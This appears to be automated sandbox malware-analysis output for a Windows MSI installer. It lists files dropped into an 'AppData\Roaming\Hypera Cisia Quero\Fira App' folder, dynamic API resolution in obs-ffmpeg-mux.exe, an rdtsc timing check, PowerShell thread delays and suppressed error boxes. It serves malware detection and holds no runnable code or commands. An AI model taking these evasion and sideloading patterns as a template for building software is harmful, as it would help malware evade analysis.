Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2E04.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2EF1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-libraryloader-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processenvironment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-datetime-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F50.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2EB2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\createdump.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\BCUninstaller.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swscale-7.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swresample-4.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2E72.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI56B3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\utest.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\avutil-58.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\w32-pthreads.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-util-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-errorhandling-l1-1-0.dll	Jump to dropped file

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2FCF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI56B3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2EB2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F90.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2E04.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2EF1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI4EE1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2E72.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI2F50.tmp	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7BFB840 FreeLibrary,free,calloc,MultiByteToWideChar,MultiByteToWideChar,MultiByteToWideChar,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryExW,_aligned_free,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,_errno,GetModuleHandleW,GetProcAddress,GetProcAddress,LoadLibraryExA,FreeLibrary,free,wcslen,GetModuleFileNameW,_aligned_free,_aligned_free,_aligned_free,wcscpy,LoadLibraryExW,LoadLibraryExW,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,_aligned_free,GetSystemDirectoryW,GetSystemDirectoryW,GetSystemDirectoryW,wcscpy,LoadLibraryExW,_aligned_free,_aligned_free,_aligned_free,_aligned_free,

11_2_00007FF8A7BFB840

Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOGPFAULTERRORBOX	Jump to behavior

Source: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\obs-ffmpeg-mux.exe

Code function: 11_2_00007FF8A7C12D90 rdtsc

11_2_00007FF8A7C12D90

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477			Jump to behavior

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3983			Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1477			Jump to behavior

Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2FCF.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\UnRar.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l2-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\msvcp140.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2EB2.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-processthreads-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-conio-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-namedpipe-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-handle-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-sysinfo-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-string-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2F90.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-filesystem-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-synch-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-timezone-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\zlib.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-rtlsupport-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI4EE1.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-localization-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\BCUninstaller.exe	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\swscale-7.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-heap-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2E72.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-console-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI56B3.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-debug-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-convert-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-file-l1-2-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\vcruntime140_1.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-memory-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-crt-environment-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-interlocked-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2E04.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\utest.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\Hypera Cisia Quero\Fira App\api-ms-win-core-profile-l1-1-0.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI2EF1.tmp	Jump to dropped file
